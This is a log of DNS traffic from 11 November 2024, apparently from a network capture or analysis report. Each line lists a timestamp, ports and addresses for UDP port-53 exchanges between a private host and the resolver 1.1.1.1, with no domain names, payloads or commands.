Nov 11, 2024 18:13:15.878582001 CET	53	59198	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.879256010 CET	53	55354	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.880297899 CET	53	57707	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.881042957 CET	53	63840	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.881087065 CET	53	51304	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.881097078 CET	53	51224	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.881716967 CET	53	52216	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.882215023 CET	53	56555	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.884062052 CET	53	57694	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.885097027 CET	53	58733	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.885150909 CET	53	49369	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.886136055 CET	53	57630	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.886374950 CET	53	56680	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.901904106 CET	53	53993	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.904253006 CET	53	49307	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:15.906605959 CET	53	56432	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:16.046487093 CET	53	54906	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.294698954 CET	60539	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.295420885 CET	62683	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.303662062 CET	51651	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.304898977 CET	53	62683	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.313719988 CET	53	51651	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.326312065 CET	53	60539	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.347187996 CET	52353	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.357827902 CET	53	52353	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.504586935 CET	57517	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.536225080 CET	53	57517	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.581294060 CET	51390	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.581412077 CET	56699	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.585825920 CET	58979	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.587040901 CET	58385	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.589833021 CET	53	51390	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.595900059 CET	53	58979	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.613306999 CET	53	56699	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.617840052 CET	53	58385	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.619956017 CET	49476	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.620176077 CET	55259	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.620312929 CET	55210	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.632091045 CET	53	49476	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.633093119 CET	53	55210	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.633774042 CET	53	55259	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.656531096 CET	54035	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.656572104 CET	55828	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.656918049 CET	59844	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.656959057 CET	62738	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.657284021 CET	58947	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.657605886 CET	52542	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.657643080 CET	49720	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.658221006 CET	64162	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.658302069 CET	52857	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.659024000 CET	61090	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.659095049 CET	54807	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.659351110 CET	62838	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.659459114 CET	49790	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.659634113 CET	60220	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.659760952 CET	63642	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.659905910 CET	49613	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.660075903 CET	60204	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.660201073 CET	56890	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.660451889 CET	64084	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.660640955 CET	51528	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.661329031 CET	51090	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.661350965 CET	60129	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.667737007 CET	53	58947	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.668210030 CET	53	49790	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.668576002 CET	53	59844	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.668586969 CET	53	49720	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.669073105 CET	53	52542	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.669084072 CET	53	60129	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.670007944 CET	53	62838	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.670541048 CET	53	61090	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.670588970 CET	53	49613	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.670599937 CET	53	60220	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.670610905 CET	53	54807	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.671068907 CET	53	64084	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.671586990 CET	53	63642	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.671633005 CET	53	56890	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.671653986 CET	53	60204	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.673284054 CET	53	51528	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.684067011 CET	49708	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.686939955 CET	60003	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.687094927 CET	50683	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.687232018 CET	64189	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.687417984 CET	58850	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.688131094 CET	50724	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.688340902 CET	53	55828	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.688385963 CET	53	62738	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.688533068 CET	62059	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.689867020 CET	53	54035	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.690413952 CET	53	64162	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.690424919 CET	53	52857	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.692840099 CET	53	51090	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.700054884 CET	53	62059	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.700541973 CET	53	58850	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.707995892 CET	55022	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.709314108 CET	54548	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.709676027 CET	63713	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.710406065 CET	57792	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.710767984 CET	60449	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.716993093 CET	55337	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.718276978 CET	53	49708	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.718688011 CET	64652	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.719506979 CET	63520	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.719902039 CET	59296	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.719909906 CET	53	64189	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.720052958 CET	53	50724	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.720063925 CET	53	50683	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.720072985 CET	53	60003	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.720427990 CET	62985	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.720635891 CET	61521	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.721996069 CET	53	63713	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.723259926 CET	53	60449	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.724400043 CET	65273	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.724544048 CET	54135	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.724802017 CET	50645	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.724818945 CET	59540	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.725469112 CET	50122	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.725645065 CET	63054	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.726093054 CET	58241	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.726330996 CET	64598	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.726749897 CET	53	55337	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.726824999 CET	61769	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.729340076 CET	53	63520	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.730627060 CET	53	61521	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.731472015 CET	63149	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.731687069 CET	60847	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.732729912 CET	53	65273	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.735523939 CET	53	59540	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.735542059 CET	53	54135	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.737205029 CET	53	58241	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.743390083 CET	53	54548	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.743421078 CET	52872	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:17.743988991 CET	53	55022	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.745608091 CET	53	57792	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.751766920 CET	53	59296	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.752331018 CET	53	64652	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.752370119 CET	53	62985	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.754327059 CET	53	52872	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.755822897 CET	53	50645	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.755834103 CET	53	50122	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.756709099 CET	53	61769	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.757064104 CET	53	63054	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.757076979 CET	53	64598	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.763035059 CET	53	63149	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:17.763638973 CET	53	60847	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.257817984 CET	63840	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.267282963 CET	53	63840	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.274061918 CET	59785	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.276560068 CET	54665	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.277817965 CET	51755	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.278310061 CET	51009	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.281363964 CET	49283	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.287590981 CET	53	51755	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.287961006 CET	53	51009	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.292754889 CET	53	49283	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.304302931 CET	53	59785	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.308439970 CET	53	54665	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.334505081 CET	58991	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.344115973 CET	50491	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.344424009 CET	53	58991	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.351856947 CET	54074	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.355010033 CET	53	50491	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.362931967 CET	53	54074	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.373157978 CET	63401	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.404061079 CET	53	63401	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.404264927 CET	57065	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.404880047 CET	54572	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.405738115 CET	58615	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.405958891 CET	49409	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.408365965 CET	58503	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.408849955 CET	61381	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.409190893 CET	57218	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.412288904 CET	49729	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.412700891 CET	52548	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.413000107 CET	57077	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.413888931 CET	50750	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.414117098 CET	53	54572	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.414599895 CET	53	57065	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.414747953 CET	63094	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.415249109 CET	61623	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.415486097 CET	55604	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.415870905 CET	53	58615	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.416335106 CET	53	49409	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.416460991 CET	60713	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.419368982 CET	53	58503	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.420109034 CET	53	61381	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.420135975 CET	61843	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.420393944 CET	57855	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.422316074 CET	58265	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.422458887 CET	53	52548	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.423918009 CET	53006	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.424094915 CET	53	49729	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.424185991 CET	54008	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.424582958 CET	53	50750	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.425007105 CET	53	63094	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.425018072 CET	53	55604	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.426924944 CET	53960	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.427092075 CET	61388	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.427422047 CET	62462	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.427664042 CET	64678	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.428262949 CET	52139	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.428484917 CET	53734	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.428813934 CET	54034	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.429059982 CET	50935	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.429398060 CET	64137	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.429589987 CET	52242	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.429775953 CET	53	61843	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.429902077 CET	64785	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.430074930 CET	58702	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.430229902 CET	53231	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.430468082 CET	49966	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.431643009 CET	53	58265	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.436918020 CET	53	64678	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.438158035 CET	53	62462	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.438168049 CET	53	53960	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.439189911 CET	53	50935	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.439378023 CET	53	60713	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.439389944 CET	53	58702	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.440066099 CET	53	49966	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.440711975 CET	53	54034	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.441145897 CET	53	57218	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.441975117 CET	53	54008	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.442487001 CET	52898	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.442930937 CET	59551	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.444602013 CET	58847	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.445060015 CET	53	57077	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.445497036 CET	50213	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.445676088 CET	61058	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.445816994 CET	52819	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.446042061 CET	64782	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.446326017 CET	53	53734	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.446471930 CET	51303	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.446508884 CET	53	61623	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.446652889 CET	59584	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.446893930 CET	51959	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.446893930 CET	51221	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.447940111 CET	53	53231	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.448091984 CET	53	64137	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.448504925 CET	65179	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.450031042 CET	56294	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.450985909 CET	54694	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.451258898 CET	58337	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.451889992 CET	53	57855	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.451900959 CET	53	52898	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.453654051 CET	53	58847	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.454384089 CET	52398	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.455190897 CET	53	50213	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.455332994 CET	53765	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.455419064 CET	53914	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.455507994 CET	58436	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.455802917 CET	53	53006	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.455848932 CET	62148	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.456121922 CET	53	64782	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.456203938 CET	53	51303	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.456625938 CET	53	52819	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.457257986 CET	53	59584	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.458033085 CET	53	61388	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.458641052 CET	53	65179	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.458651066 CET	53	52139	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.460594893 CET	53	56294	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.460681915 CET	53	52242	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.461050034 CET	53	64785	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.461083889 CET	53	54694	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.461896896 CET	53	52398	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.463054895 CET	53	58337	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.464726925 CET	53	53765	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.466027975 CET	53	51959	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.466042995 CET	53	53914	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.466669083 CET	53	58436	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.474170923 CET	53	59551	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.478235006 CET	53	61058	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.479536057 CET	53	51221	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.486319065 CET	53	62148	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.887855053 CET	49296	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.888700008 CET	53372	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.888892889 CET	53120	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.890531063 CET	49311	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.897942066 CET	53	53120	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.897977114 CET	53	49296	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.899736881 CET	53	49311	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.900196075 CET	53	53372	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.925281048 CET	53733	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.927119017 CET	50995	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.935216904 CET	51138	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.936651945 CET	53	53733	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.936754942 CET	53	50995	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.937324047 CET	65085	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.938000917 CET	58079	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.945415020 CET	53	51138	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.947695971 CET	50175	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.948174953 CET	53	65085	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.948194981 CET	53	58079	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.952626944 CET	64694	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.954875946 CET	51152	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.955817938 CET	63742	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.957076073 CET	63616	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.957294941 CET	53	50175	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.962369919 CET	57155	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.963838100 CET	52150	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.964721918 CET	49342	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.965133905 CET	60751	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.965476036 CET	58092	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.966980934 CET	53	63616	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.968450069 CET	49220	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.969825983 CET	62507	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.970702887 CET	64457	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.971116066 CET	64253	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.971998930 CET	60500	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.972551107 CET	49798	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.972955942 CET	53	57155	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.973356962 CET	62682	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.974014997 CET	53	52150	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.974281073 CET	49378	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.975200891 CET	53	60751	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.976094961 CET	53	58092	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.978514910 CET	53	49220	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.979049921 CET	65343	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.981806993 CET	53	64457	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.981868982 CET	53	60500	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.982374907 CET	53	64253	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.983653069 CET	53	62682	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.983664989 CET	53	64694	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.985205889 CET	53	49378	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.986991882 CET	53	63742	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.987270117 CET	53	51152	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:18.993957043 CET	63938	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:18.995672941 CET	53	49342	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.000782967 CET	53525	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.001224995 CET	64575	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.001408100 CET	53	62507	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.001669884 CET	60513	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.002187014 CET	51787	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.002480984 CET	52558	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.002775908 CET	56161	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.002947092 CET	65445	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.003192902 CET	58042	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.003354073 CET	62498	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:19.003703117 CET	53	49798	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.003777981 CET	53	63938	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:19.005784035 CET	60508	53	192.168.2.6	1.1.1.1
